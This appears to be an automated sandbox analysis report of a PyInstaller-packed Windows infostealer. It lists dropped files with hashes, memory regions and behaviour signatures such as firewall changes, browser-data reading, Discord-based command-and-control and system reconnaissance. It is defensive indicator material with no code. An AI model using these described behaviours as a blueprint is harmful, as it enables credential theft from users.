| SHA512 | 87b312c66916f2ffa84df26cb47dadd590b80d09768b76fe0cde5cd22c599179649bd22d619403ebac4f3c87371c0e0f1e2a2987f00d857dfcc6ebfdaabe36df |
memory/4600-100-0x00007FFFEB4B0000-0x00007FFFEB4DD000-memory.dmp
memory/4600-104-0x00007FFFEB480000-0x00007FFFEB4A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\sqlite3.dll
| MD5 | 8eef4e258e9eac8803b00a8b8862cf1f |
| SHA1 | 9cd6cc933070dbf7cb4acb17f117968450fcfd0d |
| SHA256 | b0546222f0e1002773086118aee36743de4379bdd0d983db32091c814298a2ee |
| SHA512 | 77682ede590f1fced245cf1baeaa1b8108411385d2dd1a7aa62702791eb8dc59b27f45b1899ce20284fe7ebca8d19e5cd3b6f642763ffab1fe8b05fb1817798e |
memory/4600-106-0x00007FFFEB300000-0x00007FFFEB473000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_sqlite3.pyd
| MD5 | 56ff4b8b3d857f50669453bbb5c97781 |
| SHA1 | 6d002a8f3f0d89ba577f351b7389ca6817494302 |
| SHA256 | d6cf90759d53e6dc909e5a70dae6a6e62721440488b0016ce2e65225b1a46582 |
| SHA512 | d04b643e71c1dddf739c34706fd862b78e2fd7ef158d69aea7a652e6d94158c6297713301b5169994ba1b1554419485925f1e5e48104eadf7628f299ccaea090 |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_ssl.pyd
| MD5 | 8c44f81c7fd61d1f8209c8311a97ee28 |
| SHA1 | df1916c936d54cf52e50ab7288bc81bbfeff95e4 |
| SHA256 | 3be13390721bd3f985a4bee28aabfa18c26c6467585021f9d64d091374bf2982 |
| SHA512 | e55ccdb2e1dc3300caa3509f7968f6489d674c2a109241aebcf128008c0c502e3ef32f4f7e9900ee98aed16aec8ea771a251be6244655f3213bd135fa6227223 |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\libcrypto-1_1.dll
| MD5 | 27de3adb1aa7b1ff0067d89a845c0c82 |
| SHA1 | 7a384a012c1735ad6888085ebdc5e22b77415e66 |
| SHA256 | ceb845924d20130a3f6f146c760c5c6865c671ca8ac8b0c69082bc5c02c6b8dc |
| SHA512 | 4477af703c645a6f9df898e96c15a1a264b7611073f0cb3e26bcdcc526147c851ea78bb968447c45c47fda81ba23c652a62da5e46fba5798ba5b5924a76be5de |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\libssl-1_1.dll
| MD5 | b782398ddafd39b3dd9aa6159a4c560d |
| SHA1 | 8531c0e6b40895789f74f46441b1c62a4ad90f62 |
| SHA256 | 416a018f4065f9c243b75971c8bbfd2e1e89aef0e20ffc61c131b96503a0037a |
| SHA512 | 3785e2de21a942b239f05fc3f6972836c9445d00420dbcfbdcec2b543e32b6b197ff7d2812dc3943ea849d26b00bd1a0ab97845fd05c81f73b77e84e722a857e |
memory/4600-112-0x00007FFFEB2D0000-0x00007FFFEB2FE000-memory.dmp
memory/4600-113-0x00007FFFEB210000-0x00007FFFEB2C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_asyncio.pyd
| MD5 | 7aba633225a9efe918d40c803f580a86 |
| SHA1 | bcf944b4ab962ca289bfaa354e5a5834a7d6ea5a |
| SHA256 | 23af66f34c12c9148f4a55c034fe1a36641b6ff2288ca385d03a369be053f699 |
| SHA512 | 4ecb14cb1a6547d45dd6c3f3feea68b56829c1bf3f2413f5256669ed2cce8068f4df46615880ab9c7f3c02e9507f7f0c13f92c366ac385cce8aac50ca971f88e |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_overlapped.pyd
| MD5 | 6d42cb72bc132a066d2ee369e98092f3 |
| SHA1 | 7273625e339cffb842d6b86c7605fb01a62a1700 |
| SHA256 | 2134a894e66cd459bbe27008f35b821508003c38c4e4f2f3be34c586973ca936 |
| SHA512 | f7b6dfc3aa087cd6ffff86d05b0d35cbb69b41fdad71c046d653f61ca222f3b6fbe283c4fc5868560d7879a4eb67ae9f8996efb4de2b7b92e40544578b5065f4 |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\multidict\_multidict.cp311-win_amd64.pyd
| MD5 | 025b9e660270df93a0197dde5afbc6fa |
| SHA1 | 487bb4bc3583e94a466d27f98a3728772e9cf17d |
| SHA256 | 30cb3487d462b9c86ff46c0e476d4def11a1a728c6f3d4ef24b5e2b0fe608d65 |
| SHA512 | 09c8c5b5041bc923a623c3f770f5ab33c7a0fd9c083e33ccc1b00eb9c629ad610f0c27b5f1b03994286847e32fbd505d381aa0c64fa2fa96e6244020803d374f |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_hashlib.pyd
| MD5 | d41dc04ffef63a0de45fe243eefca746 |
| SHA1 | 1e44b3fa201f04b0349a73bcf3bc6a5ae3738cfe |
| SHA256 | d7ba8112b69683027eb03ec07aebadf6687d9a52bc82156b22a2cae176c08185 |
| SHA512 | b65f3c7c280ece3521525530cc9e591185dfa91b164804e3a6967e6041140b9aa7753b575ce96b01c9ae7cb03e64850a7e4c6d6df22d81d84dbeb00af71748f7 |
memory/4600-133-0x00007FFFFB810000-0x00007FFFFB834000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\yarl\_quoting_c.cp311-win_amd64.pyd
| MD5 | 72c9f075649f274214a8abaccf17b2a1 |
| SHA1 | cb93eec3b632f7b150fa82eb5e4340175629ff02 |
| SHA256 | b75cc24aca7c33e0b04d896b99e33ff0c01781bdfe91739e001b7e3d14573b8c |
| SHA512 | 07568c2a42fd53f991a94158e285cb01055ebacff95c66000b790b474f7a472ab001c91bc315f1ef047aaa67fa1b6654d31be1f6ed3bc34c5c839eaa741f904b |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\aiohttp\_helpers.cp311-win_amd64.pyd
| MD5 | b49608e12a3f68c1584d10a76c48d4ed |
| SHA1 | ba01d8d1c5e19c6ab550e1e86b4e14483335d4de |
| SHA256 | 16248d5f337acb7fb3a713952ad355b62e2b81870d2121ad10d156e2db83197b |
| SHA512 | a3c1bd06b58453129c6e9b4fba9934a3484812083d95ae26287ef7e8cc346eba6a5fe7d9bb285fe3d2a0fa15630bbc224317d8372c7b1bb5045532c181e2dc46 |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\aiohttp\_websocket.cp311-win_amd64.pyd
| MD5 | 66d90563f45f50368cfe8095a0e7c3e3 |
| SHA1 | f9db82759d4abfc82dce0576ac4a5668ebde69a7 |
| SHA256 | 33c224f02b172bb3c5a9e501560d205b5c14b279cd2c511fdc46550d2f517976 |
| SHA512 | bd77fcafdb8a03113d182a6fc7cb96197e4a5e6aeee975883d488ba0e20e709d9b625d274e4596b96ec7cd33901c940a66fc2c0e1e427c2b8cb93511f0ba980e |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\frozenlist\_frozenlist.cp311-win_amd64.pyd
| MD5 | e1071be0938855e1651fcf6faa03f1bf |
| SHA1 | 2c6fbb2d7d695029883ddf6fad14f3e640d320cf |
| SHA256 | 319d49c4dce4fa20f120aefbbde1bef3383ab3ba60d8da9afb48b87fddde3361 |
| SHA512 | b1976fb8550ccfe52bf7db752e0f650858be41df9d40bd36fe2d8fe7e555cefa78cef865f6314a0f62bd54cd4e0369dda7499a9284305b1436791be95d299f5d |
memory/4600-156-0x00007FFFEB040000-0x00007FFFEB062000-memory.dmp
memory/4600-155-0x00007FFFEA8D0000-0x00007FFFEA8EE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\cryptography\hazmat\bindings\_rust.pyd
| MD5 | 6c63db65af4dfa891a8cb9dac7207c08 |
| SHA1 | f52a68e0fd609b0b81cc7ab68c5b86de192ff0ff |
| SHA256 | 09b758ac4233114ddff0c47bb6f74702183eee7e92f1b8f320f35c9cf8254150 |
| SHA512 | f10c454230697d678ddde0bef906a2a66ace0b5cb529a2fd4997f9230e13496296394b39a10cdf52f5efe020cec607bbdd3d72a1edc369e2ce9119fe5fb161c1 |
memory/4600-158-0x00007FFFEB500000-0x00007FFFEB519000-memory.dmp
memory/4600-154-0x00007FFFFC8E0000-0x00007FFFFC8EA000-memory.dmp
memory/4600-153-0x00007FFFEA8F0000-0x00007FFFEA901000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_cffi_backend.cp311-win_amd64.pyd
| MD5 | 988a1b64ad3b6aa856784996d6b27c6c |
| SHA1 | c680f882b875e208b47607164a54bf95ebecd0aa |
| SHA256 | d4b629d5a24574399bfec29db0aa20f35c81338596ada10a0896e75ffdcfd9a8 |
| SHA512 | 87c3a7bd449a4e144b90d428b19a5d9c4a8ae7f0f68e262dd82bc49fa5fc38ef34268f407d7ccd00f1009fb75dde8d9bf97afdcf39d98f4b19019c6d8f5a14e2 |
memory/4600-161-0x00007FFFE8FB0000-0x00007FFFE96A4000-memory.dmp
memory/4600-162-0x00007FFFE8F70000-0x00007FFFE8FA8000-memory.dmp
memory/4600-152-0x00007FFFE96B0000-0x00007FFFE96FD000-memory.dmp
memory/4600-151-0x00007FFFEAF50000-0x00007FFFEAF69000-memory.dmp
memory/4600-150-0x00007FFFEB020000-0x00007FFFEB037000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_uuid.pyd
| MD5 | 5c27cd798a3bdd169f876f846170a0ac |
| SHA1 | 4afbfe633e847544b9648a53134cc29ed1784d8b |
| SHA256 | 6fdfa272c94e606ab0133b6d9d465d648a31bf72b67101ee4ba001714f6631ec |
| SHA512 | b683b092571aa01596269ecebc6eb8f68c0027f58ab9984182354ca2ed7df09e0a58c76fe37715bf6275c5c847a9b0524b4a95f70871ec958ca3df4b957c978c |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\aiohttp\_http_parser.cp311-win_amd64.pyd
| MD5 | f9ed4c075b768652b231f094829def04 |
| SHA1 | 40fecb53184f7941d9bafa20cf4f9741b10147aa |
| SHA256 | ece6529b53f6839a5725868da5f82e00f08da08b6c649cedded89b8faedd96ae |
| SHA512 | c0eb174f0426133d1f0270e3f36663d98702b73872430a3638b31997d8e91c05c41a0df846ca0e1b5c2679a8c6c79bd155c2d9794dc0fe41a0d1ee7f8a809f5b |
C:\Users\Admin\AppData\Local\Temp\_MEI37842\aiohttp\_http_writer.cp311-win_amd64.pyd
| MD5 | 3118914d29786e0247f1c528507cc4e6 |
| SHA1 | 7ce6a43d9770762ff2cff1c7866a1ef8e1c94089 |
| SHA256 | 454d73a55843e8242224391a0bbc210434cf4ecba23ba1ba6415a9fce997115a |
| SHA512 | 13987cc529309580adafa56c91d9297f162c9cf696c626571223d810ac2487c39b6a50fa5afb8df386438b4ff0d87ad1f00b3e8f116863296642611fb0a3d4e1 |
memory/4600-135-0x00007FFFEB070000-0x00007FFFEB18C000-memory.dmp
memory/4600-132-0x00007FFFEB190000-0x00007FFFEB1A4000-memory.dmp
memory/4600-131-0x00007FFFEB1B0000-0x00007FFFEB1C4000-memory.dmp
memory/4600-130-0x00007FFFEB1D0000-0x00007FFFEB1E2000-memory.dmp
memory/4600-129-0x00007FFFEB1F0000-0x00007FFFEB205000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\unicodedata.pyd
| MD5 | 298d946d3b6602290dea169a5abdc8e1 |
| SHA1 | 0edef75f214b978b0181b9bb0de19d6f340d176b |
| SHA256 | b04ea233b5688f11cc967b747eb8e26e4fce48f31534fdbf8b5fee472c518dd2 |
| SHA512 | 9e93147f082d4fcb15be384244a0f490137d4fc616c98c9f4a17d6989559436da6bf12010e2571317067e2c10a341f1fca00a170e294f9c5d519e03fb92a4b6c |
memory/4600-118-0x00007FFFE9700000-0x00007FFFE9A75000-memory.dmp
memory/4600-117-0x0000017659980000-0x0000017659CF5000-memory.dmp
memory/4600-116-0x00007FFFE9A80000-0x00007FFFEA067000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37842\_queue.pyd
| MD5 | c95b814dfb4df76581ffb9b94f9e4971 |
| SHA1 | 756d3f30dc795bccf3f84dc69409c6b988a0c5b2 |
| SHA256 | d62ce06044705dc09ab31719b086a93a951c06f2d3768f6047f1134bd8861f5a |
| SHA512 | 3a5dad81043e9b1991b9621e742a36254d2712f7ae77483b73f3e67cbe8050bcbee2d985bf78534807a268dab61e2758170d8b431ca1e33bb7895d2c08d348a2 |
memory/4600-211-0x00007FFFFC6B0000-0x00007FFFFC6BD000-memory.dmp
memory/4600-210-0x00007FFFEB4B0000-0x00007FFFEB4DD000-memory.dmp
memory/4600-226-0x00007FFFEB480000-0x00007FFFEB4A3000-memory.dmp
memory/4600-227-0x00007FFFEB300000-0x00007FFFEB473000-memory.dmp
memory/4600-228-0x00007FFFE9700000-0x00007FFFE9A75000-memory.dmp
memory/4600-265-0x00007FFFEB2D0000-0x00007FFFEB2FE000-memory.dmp
memory/4600-264-0x00007FFFFC6B0000-0x00007FFFFC6BD000-memory.dmp
memory/4600-254-0x00007FFFEB070000-0x00007FFFEB18C000-memory.dmp
memory/4600-238-0x00007FFFE9A80000-0x00007FFFEA067000-memory.dmp
memory/4600-258-0x00007FFFE96B0000-0x00007FFFE96FD000-memory.dmp
memory/4600-266-0x00007FFFEB210000-0x00007FFFEB2C8000-memory.dmp
memory/4600-262-0x00007FFFE8FB0000-0x00007FFFE96A4000-memory.dmp
memory/4600-257-0x00007FFFEAF50000-0x00007FFFEAF69000-memory.dmp
memory/4600-256-0x00007FFFEB020000-0x00007FFFEB037000-memory.dmp
memory/4600-255-0x00007FFFEB040000-0x00007FFFEB062000-memory.dmp
memory/4600-249-0x00007FFFE9700000-0x00007FFFE9A75000-memory.dmp
memory/4600-251-0x00007FFFEB1D0000-0x00007FFFEB1E2000-memory.dmp
memory/4600-250-0x00007FFFEB1F0000-0x00007FFFEB205000-memory.dmp
memory/4600-248-0x00007FFFEB210000-0x00007FFFEB2C8000-memory.dmp
memory/4600-247-0x00007FFFEB2D0000-0x00007FFFEB2FE000-memory.dmp
memory/4600-239-0x00007FFFFB810000-0x00007FFFFB834000-memory.dmp
memory/4600-313-0x0000017659980000-0x0000017659CF5000-memory.dmp
memory/4892-314-0x00007FFFE8980000-0x00007FFFE8F67000-memory.dmp
memory/4892-317-0x00007FFFFC4A0000-0x00007FFFFC4AF000-memory.dmp
memory/4892-316-0x00007FFFE8950000-0x00007FFFE8974000-memory.dmp
memory/4600-315-0x00007FFFEB1F0000-0x00007FFFEB205000-memory.dmp
memory/4892-319-0x00007FFFFBE00000-0x00007FFFFBE0D000-memory.dmp
memory/4892-318-0x00007FFFE8930000-0x00007FFFE8949000-memory.dmp
memory/4892-323-0x00007FFFE88E0000-0x00007FFFE890D000-memory.dmp
memory/4892-322-0x00007FFFE8730000-0x00007FFFE88A3000-memory.dmp
memory/4892-321-0x00007FFFE88B0000-0x00007FFFE88D3000-memory.dmp
memory/4892-320-0x00007FFFE8910000-0x00007FFFE8929000-memory.dmp
memory/4892-327-0x0000017FB9070000-0x0000017FB93E5000-memory.dmp
memory/4892-326-0x00007FFFE82C0000-0x00007FFFE8635000-memory.dmp
memory/4892-325-0x00007FFFE8640000-0x00007FFFE86F8000-memory.dmp
memory/4892-324-0x00007FFFE8700000-0x00007FFFE872E000-memory.dmp
memory/4892-328-0x00007FFFE82A0000-0x00007FFFE82B5000-memory.dmp
memory/4892-330-0x00007FFFE8260000-0x00007FFFE8274000-memory.dmp
memory/4892-329-0x00007FFFE8280000-0x00007FFFE8292000-memory.dmp
memory/4892-331-0x00007FFFE8240000-0x00007FFFE8254000-memory.dmp
memory/4892-332-0x00007FFFE8120000-0x00007FFFE823C000-memory.dmp
memory/4892-334-0x00007FFFE80F0000-0x00007FFFE8112000-memory.dmp
memory/4892-333-0x00007FFFE8980000-0x00007FFFE8F67000-memory.dmp
memory/4892-336-0x00007FFFE80B0000-0x00007FFFE80C9000-memory.dmp
memory/4892-335-0x00007FFFE80D0000-0x00007FFFE80E7000-memory.dmp
memory/4892-338-0x00007FFFE8060000-0x00007FFFE80AD000-memory.dmp
memory/4892-337-0x00007FFFE8930000-0x00007FFFE8949000-memory.dmp
memory/4892-341-0x00007FFFE8040000-0x00007FFFE8051000-memory.dmp
memory/4892-340-0x00007FFFE8730000-0x00007FFFE88A3000-memory.dmp
memory/4892-342-0x00007FFFFB800000-0x00007FFFFB80A000-memory.dmp
memory/4892-339-0x00007FFFE88B0000-0x00007FFFE88D3000-memory.dmp
memory/4892-344-0x00007FFFE8640000-0x00007FFFE86F8000-memory.dmp
memory/4892-343-0x00007FFFE8700000-0x00007FFFE872E000-memory.dmp
memory/4892-345-0x00007FFFE82C0000-0x00007FFFE8635000-memory.dmp
memory/4892-347-0x00007FFFE8020000-0x00007FFFE803E000-memory.dmp
memory/4892-349-0x00007FFFE82A0000-0x00007FFFE82B5000-memory.dmp
memory/4892-348-0x00007FFFE7920000-0x00007FFFE8014000-memory.dmp
memory/4892-346-0x0000017FB9070000-0x0000017FB93E5000-memory.dmp
memory/4892-350-0x00007FFFE78E0000-0x00007FFFE7918000-memory.dmp
memory/4892-368-0x00007FFFE80F0000-0x00007FFFE8112000-memory.dmp
memory/4892-377-0x00007FFFE88E0000-0x00007FFFE890D000-memory.dmp
memory/4892-379-0x00007FFFFC4A0000-0x00007FFFFC4AF000-memory.dmp
memory/4892-378-0x00007FFFE8950000-0x00007FFFE8974000-memory.dmp
memory/4892-376-0x00007FFFE78E0000-0x00007FFFE7918000-memory.dmp
memory/4892-374-0x00007FFFE8020000-0x00007FFFE803E000-memory.dmp
memory/4892-373-0x00007FFFFB800000-0x00007FFFFB80A000-memory.dmp
memory/4892-372-0x00007FFFE8040000-0x00007FFFE8051000-memory.dmp
memory/4892-371-0x00007FFFE8060000-0x00007FFFE80AD000-memory.dmp
memory/4892-370-0x00007FFFE80B0000-0x00007FFFE80C9000-memory.dmp
memory/4892-369-0x00007FFFE80D0000-0x00007FFFE80E7000-memory.dmp
memory/4892-367-0x00007FFFE8120000-0x00007FFFE823C000-memory.dmp
memory/4892-366-0x00007FFFE8240000-0x00007FFFE8254000-memory.dmp
memory/4892-362-0x00007FFFE82C0000-0x00007FFFE8635000-memory.dmp
memory/4892-361-0x00007FFFE8640000-0x00007FFFE86F8000-memory.dmp
memory/4892-359-0x00007FFFE8730000-0x00007FFFE88A3000-memory.dmp
memory/4892-358-0x00007FFFE88B0000-0x00007FFFE88D3000-memory.dmp
memory/4892-356-0x00007FFFE8910000-0x00007FFFE8929000-memory.dmp
memory/4892-355-0x00007FFFFBE00000-0x00007FFFFBE0D000-memory.dmp
memory/4892-354-0x00007FFFE8930000-0x00007FFFE8949000-memory.dmp
memory/4892-375-0x00007FFFE7920000-0x00007FFFE8014000-memory.dmp
memory/4892-365-0x00007FFFE8260000-0x00007FFFE8274000-memory.dmp
memory/4892-364-0x00007FFFE8280000-0x00007FFFE8292000-memory.dmp
memory/4892-363-0x00007FFFE82A0000-0x00007FFFE82B5000-memory.dmp
memory/4892-360-0x00007FFFE8700000-0x00007FFFE872E000-memory.dmp
memory/4892-351-0x00007FFFE8980000-0x00007FFFE8F67000-memory.dmp
memory/4600-397-0x00007FFFE9A80000-0x00007FFFEA067000-memory.dmp
memory/4600-458-0x00007FFFEB480000-0x00007FFFEB4A3000-memory.dmp
memory/4600-457-0x00007FFFEB4B0000-0x00007FFFEB4DD000-memory.dmp
memory/4600-463-0x00007FFFEB1F0000-0x00007FFFEB205000-memory.dmp
memory/4600-462-0x00007FFFEB040000-0x00007FFFEB062000-memory.dmp
memory/4600-461-0x00007FFFEB210000-0x00007FFFEB2C8000-memory.dmp
memory/4600-460-0x00007FFFEB2D0000-0x00007FFFEB2FE000-memory.dmp
memory/4600-459-0x00007FFFEB300000-0x00007FFFEB473000-memory.dmp
memory/4600-456-0x00007FFFEB4E0000-0x00007FFFEB4F9000-memory.dmp
memory/4600-455-0x00007FFFFCA10000-0x00007FFFFCA1D000-memory.dmp
memory/4600-454-0x00007FFFEB500000-0x00007FFFEB519000-memory.dmp
memory/4600-453-0x00007FFFE9A80000-0x00007FFFEA067000-memory.dmp
memory/4600-452-0x00007FFFFB810000-0x00007FFFFB834000-memory.dmp
memory/4600-451-0x00007FFFFFA70000-0x00007FFFFFA7F000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-10 14:26
Reported
2024-05-10 14:28
Platform
win10v2004-20240426-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
Grants admin privileges
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
